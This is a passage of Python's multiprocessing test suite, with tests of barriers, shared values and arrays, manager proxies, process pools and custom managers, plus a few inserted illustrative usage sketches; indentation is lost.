lock = multiprocessing.Lock()
self.__setstate__((wrapper, lock))
self._lengthbuf[0] = 0
def __setstate__(self, state):
(self._wrapper, self._lock) = state
self._lengthbuf = self._wrapper.create_memoryview().cast('i')
def __getstate__(self):
return (self._wrapper, self._lock)
def append(self, _):
with self._lock:
self._lengthbuf[0] += 1
def __len__(self):
with self._lock:
return self._lengthbuf[0]
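# Illustrative sketch (not part of the original test suite): _DummyList acts as
# a shared, lock-protected counter whose current value is its length.
def _example_dummy_list():  # pragma: no cover
    counter = _DummyList()
    counter.append(True)
    counter.append(True)
    return len(counter)  # 2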
def _wait():
# A crude wait/yield function not relying on synchronization primitives.
time.sleep(0.01)
class Bunch(object):
"""
A bunch of threads.
"""
def __init__(self, namespace, f, args, n, wait_before_exit=False):
"""
Construct a bunch of `n` threads running the same function `f`.
If `wait_before_exit` is True, the threads won't terminate until
do_finish() is called.
"""
self.f = f
self.args = args
self.n = n
self.started = namespace.DummyList()
self.finished = namespace.DummyList()
self._can_exit = namespace.Event()
if not wait_before_exit:
self._can_exit.set()
threads = []
for i in range(n):
p = namespace.Process(target=self.task)
p.daemon = True
p.start()
threads.append(p)
def finalize(threads):
for p in threads:
p.join()
self._finalizer = weakref.finalize(self, finalize, threads)
def task(self):
pid = os.getpid()
self.started.append(pid)
try:
self.f(*self.args)
finally:
self.finished.append(pid)
self._can_exit.wait(30)
assert self._can_exit.is_set()
def wait_for_started(self):
while len(self.started) < self.n:
_wait()
def wait_for_finished(self):
while len(self.finished) < self.n:
_wait()
def do_finish(self):
self._can_exit.set()
def close(self):
self._finalizer()
class AppendTrue(object):
def __init__(self, obj):
self.obj = obj
def __call__(self):
self.obj.append(True)
class _TestBarrier(BaseTestCase):
"""
Tests for Barrier objects.
"""
N = 5
defaultTimeout = 30.0 # XXX Slow Windows buildbots need generous timeout
def setUp(self):
self.barrier = self.Barrier(self.N, timeout=self.defaultTimeout)
def tearDown(self):
self.barrier.abort()
self.barrier = None
def DummyList(self):
if self.TYPE == 'threads':
return []
elif self.TYPE == 'manager':
return self.manager.list()
else:
return _DummyList()
def run_threads(self, f, args):
b = Bunch(self, f, args, self.N-1)
try:
f(*args)
b.wait_for_finished()
finally:
b.close()
@classmethod
def multipass(cls, barrier, results, n):
m = barrier.parties
assert m == cls.N
for i in range(n):
results[0].append(True)
assert len(results[1]) == i * m
barrier.wait()
results[1].append(True)
assert len(results[0]) == (i + 1) * m
barrier.wait()
try:
assert barrier.n_waiting == 0
except NotImplementedError:
pass
assert not barrier.broken
def test_barrier(self, passes=1):
"""
Test that a barrier is passed in lockstep
"""
results = [self.DummyList(), self.DummyList()]
self.run_threads(self.multipass, (self.barrier, results, passes))
def test_barrier_10(self):
"""
Test that a barrier works for 10 consecutive runs
"""
return self.test_barrier(10)
@classmethod
def _test_wait_return_f(cls, barrier, queue):
res = barrier.wait()
queue.put(res)
def test_wait_return(self):
"""
test the return value from barrier.wait
"""
queue = self.Queue()
self.run_threads(self._test_wait_return_f, (self.barrier, queue))
results = [queue.get() for i in range(self.N)]
self.assertEqual(results.count(0), 1)
close_queue(queue)
@classmethod
def _test_action_f(cls, barrier, results):
barrier.wait()
if len(results) != 1:
raise RuntimeError
def test_action(self):
"""
Test the 'action' callback
"""
results = self.DummyList()
barrier = self.Barrier(self.N, action=AppendTrue(results))
self.run_threads(self._test_action_f, (barrier, results))
self.assertEqual(len(results), 1)
@classmethod
def _test_abort_f(cls, barrier, results1, results2):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
def test_abort(self):
"""
Test that an abort will put the barrier in a broken state
"""
results1 = self.DummyList()
results2 = self.DummyList()
self.run_threads(self._test_abort_f,
(self.barrier, results1, results2))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertTrue(self.barrier.broken)
@classmethod
def _test_reset_f(cls, barrier, results1, results2, results3):
i = barrier.wait()
if i == cls.N//2:
# Wait until the other threads are all in the barrier.
while barrier.n_waiting < cls.N-1:
time.sleep(0.001)
barrier.reset()
else:
try:
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
# Now, pass the barrier again
barrier.wait()
results3.append(True)
def test_reset(self):
"""
Test that a 'reset' on a barrier frees the waiting threads
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
self.run_threads(self._test_reset_f,
(self.barrier, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_abort_and_reset_f(cls, barrier, barrier2,
results1, results2, results3):
try:
i = barrier.wait()
if i == cls.N//2:
raise RuntimeError
barrier.wait()
results1.append(True)
except threading.BrokenBarrierError:
results2.append(True)
except RuntimeError:
barrier.abort()
# Synchronize and reset the barrier. Must synchronize first so
# that everyone has left it when we reset, and after so that no
# one enters it before the reset.
if barrier2.wait() == cls.N//2:
barrier.reset()
barrier2.wait()
barrier.wait()
results3.append(True)
def test_abort_and_reset(self):
"""
Test that a barrier can be reset after being broken.
"""
results1 = self.DummyList()
results2 = self.DummyList()
results3 = self.DummyList()
barrier2 = self.Barrier(self.N)
self.run_threads(self._test_abort_and_reset_f,
(self.barrier, barrier2, results1, results2, results3))
self.assertEqual(len(results1), 0)
self.assertEqual(len(results2), self.N-1)
self.assertEqual(len(results3), self.N)
@classmethod
def _test_timeout_f(cls, barrier, results):
i = barrier.wait()
if i == cls.N//2:
# One thread is late!
time.sleep(1.0)
try:
barrier.wait(0.5)
except threading.BrokenBarrierError:
results.append(True)
def test_timeout(self):
"""
Test wait(timeout)
"""
results = self.DummyList()
self.run_threads(self._test_timeout_f, (self.barrier, results))
self.assertEqual(len(results), self.barrier.parties)
@classmethod
def _test_default_timeout_f(cls, barrier, results):
i = barrier.wait(cls.defaultTimeout)
if i == cls.N//2:
# One thread is later than the default timeout
time.sleep(1.0)
try:
barrier.wait()
except threading.BrokenBarrierError:
results.append(True)
def test_default_timeout(self):
"""
Test the barrier's default timeout
"""
barrier = self.Barrier(self.N, timeout=0.5)
results = self.DummyList()
self.run_threads(self._test_default_timeout_f, (barrier, results))
self.assertEqual(len(results), barrier.parties)
def test_single_thread(self):
b = self.Barrier(1)
b.wait()
b.wait()
@classmethod
def _test_thousand_f(cls, barrier, passes, conn, lock):
for i in range(passes):
barrier.wait()
with lock:
conn.send(i)
def test_thousand(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
passes = 1000
lock = self.Lock()
conn, child_conn = self.Pipe(False)
for j in range(self.N):
p = self.Process(target=self._test_thousand_f,
args=(self.barrier, passes, child_conn, lock))
p.start()
self.addCleanup(p.join)
for i in range(passes):
for j in range(self.N):
self.assertEqual(conn.recv(), i)
#
#
#
class _TestValue(BaseTestCase):
ALLOWED_TYPES = ('processes',)
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('q', 2 ** 33, 2 ** 34),
('c', latin('x'), latin('y'))
]
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _test(cls, values):
for sv, cv in zip(values, cls.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.daemon = True
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
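# Illustrative sketch (not part of the test suite) of the Value API checked
# above: the typecode selects the underlying C type and get_lock() exposes the
# lock that the synchronized wrapper uses.
def _example_value_api():
    import multiprocessing
    counter = multiprocessing.Value('i', 0)   # 'i' -> C int, initial value 0
    with counter.get_lock():                  # the same lock a child process would share
        counter.value += 1
    return counter.value                      # 1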
class _TestArray(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def f(cls, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array(self, raw=False):
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.daemon = True
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_array_from_size(self):
size = 10
# Test for zeroing (see issue #11675).
# The repetition below strengthens the test by increasing the chances
# of previously allocated non-zero memory being used for the new array
# on the 2nd and 3rd loops.
for _ in range(3):
arr = self.Array('i', size)
self.assertEqual(len(arr), size)
self.assertEqual(list(arr), [0] * size)
arr[:] = range(10)
self.assertEqual(list(arr), list(range(10)))
del arr
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_rawarray(self):
self.test_array(raw=True)
@unittest.skipIf(c_int is None, "requires _ctypes")
def test_getobj_getlock_obj(self):
arr1 = self.Array('i', list(range(10)))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', list(range(10)), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', list(range(10)), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
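# Illustrative sketch (not part of the test suite): manager proxies such as
# list() and dict() forward every operation to the manager process, so
# mutations are visible through any handle -- the property the container
# tests below depend on.
def _example_manager_containers():
    import multiprocessing
    with multiprocessing.Manager() as manager:
        shared_list = manager.list(range(3))
        shared_dict = manager.dict(answer=42)
        shared_list.append('hello')
        shared_dict['extra'] = True
        return shared_list[:], shared_dict.copy()   # ([0, 1, 2, 'hello'], {'answer': 42, 'extra': True})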
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
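# Illustrative sketch (not part of the test suite) of the Pool entry points
# exercised below, reusing the module-level sqr() helper: map() blocks for all
# results, imap() streams them, and apply_async() hands back an AsyncResult.
def _example_pool_usage():
    import multiprocessing
    with multiprocessing.Pool(2) as pool:
        blocking = pool.map(sqr, range(5))          # [0, 1, 4, 9, 16]
        streamed = list(pool.imap(sqr, range(5)))   # same values, produced lazily
        pending = pool.apply_async(sqr, (6,))
        return blocking, streamed, pending.get()    # (..., ..., 36)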
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
    def test_map_unpicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
        # contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
        # With a process pool, copies of the objects are returned; check
        # that they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
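# Illustrative sketch (not part of the test suite): with apply_async() a
# worker exception is handed to error_callback and only re-raised from
# AsyncResult.get(), which is what the tests below verify for raising().
def _example_error_callback():
    import multiprocessing
    seen = []
    with multiprocessing.Pool(1) as pool:
        res = pool.apply_async(raising, error_callback=seen.append)
        try:
            res.get(timeout=10)
        except KeyError:
            pass
    return seen                                     # [KeyError('key')]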
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
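# Illustrative sketch (not part of the test suite) of driving a customized
# manager such as MyManager: entering the context starts the server process,
# and every registered name becomes a proxy factory on the manager instance.
def _example_custom_manager():
    with MyManager() as manager:
        foo = manager.Foo()      # proxy for a FooBar object living in the server
        return foo.f()           # 'f()'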
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# If the manager process exited cleanly then the exitcode
# will be zero. Otherwise (after a short timeout)
# terminate() is used, resulting in an exitcode of -SIGTERM.
self.assertEqual(manager._process.exitcode, 0)
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
